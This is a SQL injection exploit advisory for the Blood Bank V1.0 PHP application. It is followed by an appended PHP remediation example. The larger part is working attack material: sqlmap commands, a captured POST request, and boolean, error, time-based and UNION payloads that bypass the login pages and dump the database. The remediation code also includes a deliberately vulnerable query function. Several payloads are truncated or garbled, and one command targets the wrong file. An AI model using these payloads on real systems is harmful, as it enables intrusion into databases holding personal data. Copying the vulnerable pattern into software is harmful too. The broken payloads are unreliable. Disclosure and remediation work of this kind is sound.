# Exploit Title: Blood Bank V1.0 - SQL Injection
# Date: 2023-11-14
# Exploit Author: Ersin Erenler
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-with-source-code
# Software Link: https://download-media.code-project...n_in_php_with_with_source_source_code.zip.zip
# Version: 1.0
# Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0
# CVE : CVE-2023-46014, CVE-2023-46017, CVE-2023-46018
----------------------------------------------------------------------------------------------------------------------------
1. Description:
Lack of proper input validation and sanitization on the "hemail" and "hpassword" parameters allows an attacker to craft SQL injection queries, bypass the authentication mechanism and gain unauthorized access to the database.
Vulnerable File: /hospitalLogin.php
Parameter Name: hemail, hpassword
2. Proof of Concept:
--------------------------------------
Execute sqlmap against the "hemail" or "hpassword" parameter to retrieve the current database:
sqlmap -u 'http://localhost/bloodbank/file/hospitalLogin.php' --method POST --data 'hemail=test@test&hpassword=test&login=Login' -p hemail --risk 3 --level 3 --dbms mysql --batch --current-db
sqlmap response:
--------------------------------------
Parameter: hemail (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&login=Login

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71) nsqu&hpassword=test&login=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: hemail=test@test' AND (FROM (SELECT(SLEEP(5)))ULGW)-- Qynb&hpassword=test&login=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b5569767676766869687875454f48514d6e634242424a706f707141414e62684 F504A7A565178736A,0x7170767a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&login=Login
----------------------------------------------------------------------------------------------------------------------------
1. Description:
Lack of proper input validation and sanitization on the "remail" and "rpassword" parameters allows an attacker to craft SQL injection queries, bypass the authentication mechanism and gain unauthorized access to the database.
Vulnerable File: /receiverLogin.php
Parameter Name: remail, rpassword
2. Proof of Concept:
--------------------------------------
Execute sqlmap against the "remail" or "rpassword" parameter to retrieve the current database:
sqlmap -u 'http://localhost/bloodbank/file/receiverLogin.php' --method POST --data 'remail=test@test&rpassword=test&rlogin=Login' -p remail --risk 3 --level 5 --dbms mysql --batch --current-db
sqlmap -u 'http://localhost/bloodbank/file/hospitalLogin.php' --method POST --data 'hemail=test@test&hpassword=test&login=Login' -p rpassword --risk 3 --level 5 --dbms mysql --batch --current-db
sqlmap response:
--------------------------------------
---
Parameter: remail (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x717070717171) hyeh&rpassword=test&rlogin=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: remail=test@test' AND (FROM (SELECT(SLEEP(5)))hwqj)-- nufn&rpassword=test&rlogin=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4E764E5452452486270544A6E6E6E4C705A795A795A667441756D5556B416B416E7961484A 534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login
---
---
Parameter: rpassword (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171) vrqw&rlogin=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: remail=test@test&rpassword=test' AND (FROM (SELECT(SLEEP(5)))eegb)-- cuoy&rlogin=Login

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d7763767676706f477996d474a74a74a736a485666f72625a4e6d537 247665a4444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login
---
----------------------------------------------------------------------------------------------------------------------------
# Description:
Lack of proper input validation and sanitization on the "remail" parameter allows an attacker to craft SQL injection queries, bypass the authentication mechanism and gain unauthorized access to the database.
Vulnerable File: /receiverReg.php
Parameter Name: remail
# Proof of Concept:
--------------------------------------
1. Save the POST request to receiverReg.php into a file named request.txt
---
POST /bloodbank/file/receiverReg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------------- 2653697510272605730288393868
Content-Length: 877
Origin: http://localhost
Connection: close
Referer: http://localhost/bloodbank/register.php
Cookie: PHPSESSID=some-cookie-value
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-------------------------------------- 2653697510272605730288393868
Content-Disposition: form-data; name="rname"

test
-------------------------------------- 2653697510272605730288393868
Content-Disposition: form-data; name="rbg"

A+
-------------------------------------- 2653697510272605730288393868
Content-Disposition: form-data; name="rcity"

test
-------------------------------------- 2653697510272605730288393868
Content-Disposition: form-data; name="rphone"

05555555555555555
-------------------------------------- 2653697510272605730288393868
Content-Disposition: form-data; name="remail"

test@test
-------------------------------------- 2653697510272605730288393868
Content-Disposition: form-data; name="rpassword"

Test123
-------------------------------------- 2653697510272605730288393868
Content-Disposition: form-data; name="rregister"

Register
-------------------------------------- 2653697510272605730288393868--
---
2. Execute sqlmap against the "remail" parameter to retrieve the current database:
sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db
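All three findings above come from the same defect: request parameters are placed directly into SQL text. As an added example that is not part of this advisory and not the Blood Bank project's own source (which the advisory does not reproduce), the following PHP shows the concatenated-query pattern behind the hospitalLogin.php / receiverLogin.php findings beside a fixed login handler, and a fixed registration handler for the receiverReg.php form fields, both using PDO prepared statements. The DSN, credentials, table names (hospital, receiver) and column names (hid, hemail, hpassword, rname, rbg, rcity, rphone, remail, rpassword) are assumptions chosen to match the parameter names on this page.

```php
<?php
// Added example, not code from the Blood Bank project. Table, column, DSN and
// credential values below are assumptions that mirror the advisory's parameter names.
declare(strict_types=1);

function connect(): PDO
{
    // Assumed DSN and credentials; substitute the deployment's own values.
    return new PDO(
        'mysql:host=localhost;dbname=bloodbank;charset=utf8mb4',
        'app_user',
        'app_password',
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            // Server-side prepares: bound values are sent apart from the SQL text.
            PDO::ATTR_EMULATE_PREPARES => false,
        ]
    );
}

// The shape of code that produces the finding: request values are spliced into the
// query string, so a single quote in hemail or hpassword rewrites the WHERE clause.
function vulnerableHospitalLogin(PDO $pdo, string $hemail, string $hpassword): bool
{
    $sql = "SELECT * FROM hospital WHERE hemail='$hemail' AND hpassword='$hpassword'";
    return $pdo->query($sql)->fetch() !== false;
}

// Hardened login: shape-check the e-mail, bind it as a parameter, and verify a
// password hash in PHP instead of comparing a stored plaintext password inside SQL.
// Returns the hospital id on success, null otherwise.
function hospitalLogin(PDO $pdo, string $hemail, string $hpassword): ?int
{
    if (filter_var($hemail, FILTER_VALIDATE_EMAIL) === false || $hpassword === '') {
        return null;
    }
    $stmt = $pdo->prepare('SELECT hid, hpassword FROM hospital WHERE hemail = :hemail LIMIT 1');
    $stmt->execute([':hemail' => $hemail]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($hpassword, $row['hpassword'])) {
        return null; // same answer for an unknown e-mail and a wrong password
    }
    return (int) $row['hid'];
}

// Hardened registration (the INSERT behind receiverReg.php): every form field from
// the multipart request above is bound, the e-mail and phone are shape-checked, and
// the password is stored as a hash.
function registerReceiver(PDO $pdo, array $form): bool
{
    foreach (['rname', 'rbg', 'rcity', 'rphone', 'remail', 'rpassword'] as $field) {
        if (!isset($form[$field]) || !is_string($form[$field]) || $form[$field] === '') {
            return false;
        }
    }
    if (filter_var($form['remail'], FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    if (!preg_match('/^[0-9+ ()-]{6,20}$/', $form['rphone'])) {
        return false;
    }
    $stmt = $pdo->prepare(
        'INSERT INTO receiver (rname, rbg, rcity, rphone, remail, rpassword)
         VALUES (:rname, :rbg, :rcity, :rphone, :remail, :rpassword)'
    );
    return $stmt->execute([
        ':rname'     => $form['rname'],
        ':rbg'       => $form['rbg'],
        ':rcity'     => $form['rcity'],
        ':rphone'    => $form['rphone'],
        ':remail'    => $form['remail'],
        ':rpassword' => password_hash($form['rpassword'], PASSWORD_DEFAULT),
    ]);
}

// Hypothetical wiring in the request-handling pages:
// $pdo = connect();
// $hid = hospitalLogin($pdo, $_POST['hemail'] ?? '', $_POST['hpassword'] ?? '');
// $ok  = registerReceiver($pdo, $_POST);
```

The prepared statement is the actual fix: once a value is bound, nothing in hemail, hpassword or remail can change the structure of the query, which removes the boolean-, error-, time-based and UNION techniques listed in the sqlmap output at the root. The filter_var and preg_match checks only narrow the input shape and are not a substitute for binding; password_verify additionally takes the password comparison out of SQL entirely. The same two changes apply unchanged to receiverLogin.php's remail/rpassword handling.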